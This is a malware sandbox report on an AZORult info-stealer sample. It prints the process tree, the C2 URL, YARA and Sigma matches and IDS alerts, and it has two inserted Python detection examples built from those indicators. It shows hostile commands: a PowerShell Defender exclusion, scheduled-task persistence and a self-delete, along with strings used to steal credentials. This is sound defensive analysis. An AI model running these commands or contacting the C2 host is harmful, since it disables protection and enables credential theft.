Windows Analysis Report
MUH030425.exe

Overview

General Information

Sample name: MUH030425.exe
Analysis ID: 1628929
MD5: 7958c012f2efc42cc7ff436d3377abcc
SHA1: d854a2cb11b56d64dd7f87ee91ea47f305ce82bf
SHA256: b5c538f89ca2e3d9a8085bc387d85f7f50e9470975ffec25fe040c26226beccb
Tags: AZORult, exe, user-abuse_ch

Detection

Azorult
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Azorult
Yara detected Azorult Info Stealer
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Infects executable files (exe, dll, sys, html)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to many different domains
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • MUH030425.exe (PID: 6244 cmdline: "C:\Users\user\Desktop\MUH030425.exe" MD5: 7958C012F2EFC42CC7FF436D3377ABCC)
    • powershell.exe (PID: 6436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7604 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 764 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 2024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • cmd.exe (PID: 8116 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 8176 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 748 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 1792 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • armsvc.exe (PID: 2752 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 3D877723521E447854F2D14A399DF609)
  • alg.exe (PID: 2788 cmdline: C:\Windows\System32\alg.exe MD5: 61760BE49CD9708D843449EAD1D669A3)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 4324 cmdline: C:\Windows\system32\AppVClient.exe MD5: BF39D0936217E1A59C83468A6716E70E)
  • wBBaygjR.exe (PID: 4108 cmdline: C:\Users\user\AppData\Roaming\wBBaygjR.exe MD5: 7958C012F2EFC42CC7FF436D3377ABCC)
  • FXSSVC.exe (PID: 4944 cmdline: C:\Windows\system32\fxssvc.exe MD5: 86BDE7868C6C41A00C97E73C1CD72B93)
  • elevation_service.exe (PID: 1072 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 67BB480DD6819EAD60CD2E73B029F950)
  • maintenanceservice.exe (PID: 2016 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 56DA935CD0FEE49A761CCBCA2668689D)
  • msdtc.exe (PID: 1876 cmdline: C:\Windows\System32\msdtc.exe MD5: 19DFE2392D1CF697BE730F1FF609BAD9)
  • PerceptionSimulationService.exe (PID: 4984 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: D65BAF460BDD6585F754EDC9F491A86A)
  • perfhost.exe (PID: 4324 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: B241E79D1D240C51DA8A9AC98E851CE2)
  • Locator.exe (PID: 7220 cmdline: C:\Windows\system32\locator.exe MD5: 21B5E199C73F3F7A731A5112250DCE39)
  • SensorDataService.exe (PID: 7272 cmdline: C:\Windows\System32\SensorDataService.exe MD5: BB8AEE9F1D920A95B225E78F061D5DDB)
  • snmptrap.exe (PID: 7324 cmdline: C:\Windows\System32\snmptrap.exe MD5: F780962D6375440FB2BCBEC6BD256F90)
  • Spectrum.exe (PID: 7356 cmdline: C:\Windows\system32\spectrum.exe MD5: 45373E5182419E96D4055979A8B2C87A)
  • ssh-agent.exe (PID: 7456 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 7310EF4C2A9585A6BDD6BD676EC7D705)
  • TieringEngineService.exe (PID: 7528 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: CC81E30E0B7BD855805ED98047EE9AB2)
  • AgentService.exe (PID: 7620 cmdline: C:\Windows\system32\AgentService.exe MD5: CC178E98936A3498548AC8CB29D26EF7)
  • vds.exe (PID: 7688 cmdline: C:\Windows\System32\vds.exe MD5: F92E9FF7433F8726D70F67D0B8FE8A69)
  • wbengine.exe (PID: 7824 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 41033F6D61728B9E9F4ED8045CDB4880)
  • cleanup
Name: Azorult
Description: AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.
Attribution: The Gorgon Group
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Extracted malware configuration: {"C2 url": "http://k1d5.icu/TP341/index.php"}
Yara matches in memory dumps (Source / Rule / Description / Author / Strings)

Source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Author: Joe Security
  Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Author: Joe Security
  Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Author: unknown
    • 0x128918:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
    • 0x11bc40:$a2: %APPDATA%\.purple\accounts.xml
    • 0x11c388:$a3: %TEMP%\curbuf.dat
    • 0x12869c:$a4: PasswordsList.txt
    • 0x1236a0:$a5: Software\Valve\Steam
  Rule: Azorult, Description: detect Azorult in memory, Author: JPCERT/CC Incident Response Group
    • 0x126ae0:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    • 0x127140:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    • 0x128828:$v2: http://ip-api.com/json
    • 0x12749a:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Author: Joe Security
(20 further entries not shown)
Yara matches in unpacked PEs (Source / Rule / Description / Author / Strings)

Source: 8.2.RegSvcs.exe.4f5999a.6.raw.unpack
  Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
  Rule: OlympicDestroyer_1, Description: OlympicDestroyer Payload, Author: kevoreilly
    • 0x299269:$string1: SELECT origin_url, username_value, password_value FROM logins
    • 0x29a19a:$string1: SELECT origin_url, username_value, password_value FROM logins
    • 0x109a34:$string2: API call with %s database connection pointer
    • 0x10a668:$string3: os_win.c:%d: (%lu) %s(%s) - %s
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack
  Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Author: Joe Security
  Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Author: Joe Security
  Rule: Windows_Trojan_Azorult_38fce9ea, Description: unknown, Author: unknown
    • 0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del "
    • 0xd778:$a2: %APPDATA%\.purple\accounts.xml
    • 0xdec0:$a3: %TEMP%\curbuf.dat
    • 0x1a1d4:$a4: PasswordsList.txt
    • 0x151d8:$a5: Software\Valve\Steam
(12 further entries not shown)
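The rule strings listed above are the reusable indicators from this report: four text strings from the Windows_Trojan_Azorult_38fce9ea rule and, from the JPCERT/CC rule, a user-agent, the ip-api URL and an 11-byte x86 code sequence. The following is an added example, not part of the Joe Sandbox report and not the code of either rule: a minimal scanner that applies those string sets to a byte buffer (a memory dump or an unpacked region) and reports offsets in the `0xOFFSET:$name` form the report uses. The rules' conditions are not shown on the page, so the "N of M" thresholds below are assumptions, and the buffer scanned is constructed for the example.

```python
from typing import Dict, List

# String sets copied from the two rules whose matches the report lists. The rules' real
# conditions are not on the page; the `need` thresholds are an assumption for this example.
RULES = {
    "Windows_Trojan_Azorult_38fce9ea": {
        "need": 3,
        "strings": {
            "$a1": b'/c %WINDIR%\\system32\\timeout.exe 3 & del "',
            "$a2": b"%APPDATA%\\.purple\\accounts.xml",
            "$a3": b"%TEMP%\\curbuf.dat",
            "$a4": b"PasswordsList.txt",
            "$a5": b"Software\\Valve\\Steam",
        },
    },
    "Azorult_JPCERT": {
        "need": 2,
        "strings": {
            "$v1": b"Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
            "$v2": b"http://ip-api.com/json",
            # x86: mov byte [edi],0x1E / mov byte [edi+1],0x15 / mov byte [edi+2],0x34.
            # A code pattern keeps matching when the text strings are re-encoded or split.
            "$v3": bytes.fromhex("C6 07 1E C6 47 01 15 C6 47 02 34"),
        },
    },
}


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every offset of needle in buf (overlapping hits included)."""
    offs, i = [], buf.find(needle)
    while i != -1:
        offs.append(i)
        i = buf.find(needle, i + 1)
    return offs


def scan(buf: bytes) -> Dict[str, Dict[str, List[int]]]:
    """Per rule, the offsets of each string that occurs in buf (a rule with no hit maps to {})."""
    result: Dict[str, Dict[str, List[int]]] = {}
    for rule, spec in RULES.items():
        hits = {}
        for name, s in spec["strings"].items():
            offs = find_all(buf, s)
            if offs:
                hits[name] = offs
        result[rule] = hits
    return result


def matched_rules(buf: bytes) -> List[str]:
    """Rules whose assumed 'need' threshold is reached."""
    return [rule for rule, hits in scan(buf).items() if len(hits) >= RULES[rule]["need"]]


# Constructed buffer standing in for a memory region: padding, three of the Windows_Trojan
# strings, the ip-api URL and the mov-byte sequence.
SAMPLE = (
    b"\x00" * 0x40 + b"MZ" + b"\x00" * 0x20
    + b'/c %WINDIR%\\system32\\timeout.exe 3 & del "' + b"\x00" * 8
    + b"PasswordsList.txt\x00"
    + b"Software\\Valve\\Steam\x00"
    + b"http://ip-api.com/json\x00"
    + bytes.fromhex("C6 07 1E C6 47 01 15 C6 47 02 34")
    + b"\x00" * 16
)

if __name__ == "__main__":
    matched = matched_rules(SAMPLE)
    for rule, hits in scan(SAMPLE).items():
        print(f"{rule}: {'MATCH' if rule in matched else 'no match'}")
        for name, offs in hits.items():
            print("  " + ", ".join(f"{hex(o)}:{name}" for o in offs))
```

To scan a real artifact, read the `.sdmp` or unpacked file with `open(path, "rb").read()` and pass it to `scan`; the `$v3` code pattern is the one to keep when a newer build has rewritten its string table.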

              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", ProcessId: 6436, ProcessName: powershell.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", ProcessId: 6436, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", ProcessId: 764, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe", ProcessId: 6436, ProcessName: powershell.exe

              Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\MUH030425.exe", ParentImage: C:\Users\user\Desktop\MUH030425.exe, ParentProcessId: 6244, ParentProcessName: MUH030425.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp", ProcessId: 764, ProcessName: schtasks.exe
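The Sigma hits above all come from the process tree: an executable in the user profile spawning powershell.exe with Add-MpPreference -ExclusionPath, schtasks.exe /Create with an /XML definition in %TEMP%, RegSvcs.exe started with an empty command line (the process that later carried the Azorult payload), and a cmd.exe "timeout 3 & del" that removes its parent's image. The following is an added example and is not part of the Joe Sandbox report or of the Sigma rules it cites: it runs those four checks in Python over process-creation records constructed from the tree (PIDs, images and command lines copied from it; the explorer.exe parents and the D:\Builds control row are assumed).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the image that started
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


# Constructed input: PIDs, images and command lines copied from the process tree in this
# report; the explorer.exe parents (pid 1000/9000) and the D:\Builds control row are assumed.
EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(6244, 1000, r"C:\Users\user\Desktop\MUH030425.exe", r'"C:\Users\user\Desktop\MUH030425.exe"'),
    ProcEvent(6436, 6244, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"'),
    ProcEvent(3000, 6244, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"'),
    ProcEvent(764, 6244, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp"'),
    ProcEvent(2024, 6244, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    ProcEvent(8116, 2024, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RegSvcs.exe"'),
    ProcEvent(9000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(9001, 9000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe Add-MpPreference -ExclusionPath "D:\Builds"'),   # assumed benign admin use
]

USER_WRITABLE = re.compile(r"\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\", re.I)
TEMP_DIR = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
MPPREF = re.compile(r'Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+"?([^"]+)', re.I)
SELF_DELETE = re.compile(r'timeout(?:\.exe)?\s+\d+\s*&+\s*del\s+"?([^"&\s]+)', re.I)
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe", "applaunch.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def defender_exclusion(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """T1562.001: an exclusion for a user-writable path, or requested by a parent living there."""
    m = MPPREF.search(ev.cmdline) if basename(ev.image) == "powershell.exe" else None
    if not m:
        return None
    excluded = m.group(1).strip()
    if USER_WRITABLE.search(excluded) or (parent and USER_WRITABLE.search(parent.image)):
        return Finding("defender_exclusion", ev.pid, excluded)
    return None


def schtasks_xml_from_temp(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """T1053.005: task registered from an XML definition dropped in a temp directory."""
    if basename(ev.image) != "schtasks.exe":
        return None
    m = re.search(r'/create\b.*?/xml\s+"?([^"]+)', ev.cmdline, re.I)
    if m and TEMP_DIR.search(m.group(1)):
        return Finding("schtasks_xml_from_temp", ev.pid, m.group(1).strip())
    return None


def self_delete(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """cmd.exe waiting on timeout then deleting a file; high confidence when it is the parent's image."""
    if basename(ev.image) != "cmd.exe":
        return None
    m = SELF_DELETE.search(ev.cmdline)
    if not m:
        return None
    target = basename(m.group(1))
    if parent and target == basename(parent.image):
        return Finding("self_delete_parent", ev.pid, f"{target} removed by its own child")
    return Finding("timeout_then_del", ev.pid, target)


def dotnet_host_no_args(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Finding]:
    """A .NET utility started with an empty command line by something in a user-writable path:
    the usual target of process hollowing (here RegSvcs.exe, which then carried the stealer)."""
    if basename(ev.image) not in DOTNET_HOSTS:
        return None
    rest = re.sub(r'^\s*(?:"[^"]*"|\S+)\s*', "", ev.cmdline)   # drop the program token
    if rest or not (parent and USER_WRITABLE.search(parent.image)):
        return None
    return Finding("dotnet_host_no_args", ev.pid,
                   f"{basename(ev.image)} started without arguments by {basename(parent.image)}")


RULES = [defender_exclusion, schtasks_xml_from_temp, self_delete, dotnet_host_no_args]


def run_detections(events: List[ProcEvent]) -> List[Finding]:
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Finding] = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        findings.extend(f for f in (rule(ev, parent) for rule in RULES) if f)
    return findings


if __name__ == "__main__":
    for f in run_detections(EVENTS):
        print(f"{f.rule:24} pid={f.pid:<5} {f.detail}")
```

The parent lookup is what separates the two real exclusions (requested by a Desktop executable, for Desktop and Roaming paths) from the assumed admin row, and what turns a generic "timeout then del" into the self-delete of the hollowed RegSvcs.exe. Feed it Sysmon event 1 or Security 4688 records mapped onto ProcEvent; note the exclusion regex only covers the plain -ExclusionPath form seen here, not the base64-encoded variant the second Sigma rule in this section targets.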
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source port | Destination IP | Destination port | Protocol
2025-03-04T09:34:47.362851+0100 | 2029137 | 1 | Malware Command and Control Activity Detected | 104.21.96.1 | 80 | 192.168.2.9 | 49707 | TCP
2025-03-04T09:36:24.491907+0100 | 2051651 | 1 | A Network Trojan was detected | 192.168.2.9 | 64907 | 1.1.1.1 | 53 | UDP
2025-03-04T09:34:52.672541+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.9 | 65066 | 1.1.1.1 | 53 | UDP
2025-03-04T09:34:54.647828+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.9 | 50995 | 1.1.1.1 | 53 | UDP
2025-03-04T09:34:50.416039+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.9 | 50942 | 1.1.1.1 | 53 | UDP
2025-03-04T09:34:52.148655+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.9 | 61505 | 1.1.1.1 | 53 | UDP
2025-03-04T09:34:47.944002+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.9 | 49710 | TCP
2025-03-04T09:34:48.219952+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.9 | 49709 | TCP
2025-03-04T09:34:50.416777+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.9 | 49713 | TCP
2025-03-04T09:35:28.388771+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.9 | 49744 | TCP
2025-03-04T09:35:36.378574+0100 | 2018141 | 1 | A Network Trojan was detected | 34.227.7.138 | 80 | 192.168.2.9 | 49754 | TCP
2025-03-04T09:35:41.626939+0100 | 2018141 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.9 | 49759 | TCP
2025-03-04T09:35:42.285943+0100 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.9 | 49760 | TCP
2025-03-04T09:35:54.407982+0100 | 2018141 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.9 | 49770 | TCP
2025-03-04T09:35:57.030381+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.9 | 49772 | TCP
2025-03-04T09:36:17.244513+0100 | 2018141 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.9 | 49789 | TCP
2025-03-04T09:36:24.491833+0100 | 2018141 | 1 | A Network Trojan was detected | 3.254.94.185 | 80 | 192.168.2.9 | 49797 | TCP
2025-03-04T09:34:47.944002+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.9 | 49710 | TCP
2025-03-04T09:34:48.219952+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.9 | 49709 | TCP
2025-03-04T09:34:50.416777+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.9 | 49713 | TCP
2025-03-04T09:35:28.388771+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.9 | 49744 | TCP
2025-03-04T09:35:36.378574+0100 | 2037771 | 1 | A Network Trojan was detected | 34.227.7.138 | 80 | 192.168.2.9 | 49754 | TCP
2025-03-04T09:35:41.626939+0100 | 2037771 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.9 | 49759 | TCP
2025-03-04T09:35:42.285943+0100 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.9 | 49760 | TCP
2025-03-04T09:35:54.407982+0100 | 2037771 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.9 | 49770 | TCP
